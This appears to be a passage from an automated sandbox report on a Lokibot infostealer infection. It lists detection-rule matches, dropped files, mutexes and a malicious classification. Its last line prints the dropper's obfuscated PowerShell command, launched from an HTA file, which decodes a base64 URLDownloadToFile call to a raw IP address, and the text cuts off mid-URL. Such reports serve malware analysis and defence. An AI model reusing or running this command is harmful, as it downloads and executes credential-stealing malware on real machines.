            Source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 6.2.wininit.exe.36ef1e0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 6.2.wininit.exe.36ef1e0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 6.2.wininit.exe.36ef1e0.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 6.2.wininit.exe.36ef1e0.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: wininit.exe PID: 4416, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Process Memory Space: wininit.exe PID: 2668, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\caspol[1].exeJump to dropped file
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 6_2_0254D51C6_2_0254D51C
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 6_2_0666B3286_2_0666B328
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 6_2_066676586_2_06667658
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 6_2_066656A86_2_066656A8
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 6_2_06665F186_2_06665F18
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 6_2_066652706_2_06665270
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 6_2_06665AE06_2_06665AE0
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 9_2_0040549C9_2_0040549C
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 9_2_004029D49_2_004029D4
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\caspol[1].exe 59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy) 59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: String function: 00405B6F appears 42 times
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: 6.2.wininit.exe.3709200.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 6.2.wininit.exe.3709200.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 6.2.wininit.exe.3709200.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 6.2.wininit.exe.3709200.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 9.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.wininit.exe.3709200.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 6.2.wininit.exe.36ef1e0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 6.2.wininit.exe.36ef1e0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 6.2.wininit.exe.36ef1e0.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 6.2.wininit.exe.36ef1e0.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: wininit.exe PID: 4416, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Process Memory Space: wininit.exe PID: 2668, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: caspol[1].exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: wininit.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.SetAccessControl
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.AddAccessRule
            Source: 6.2.wininit.exe.6db0000.5.raw.unpack, BE5k0LFu5KnoWIB8ne.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.SetAccessControl
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.AddAccessRule
            Source: 6.2.wininit.exe.374d400.1.raw.unpack, BE5k0LFu5KnoWIB8ne.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@20/27@1/3
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 9_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,9_2_0040650A
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 9_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,9_2_0040434D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\caspol[1].exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3196:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hc2im1uf.x12.ps1Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: goodtoseeuthatgreatthingswithentirethingsgreatfor.htaReversingLabs: Detection: 15%
            Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\goodtoseeuthatgreatthingswithentirethingsgreatfor.hta"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMz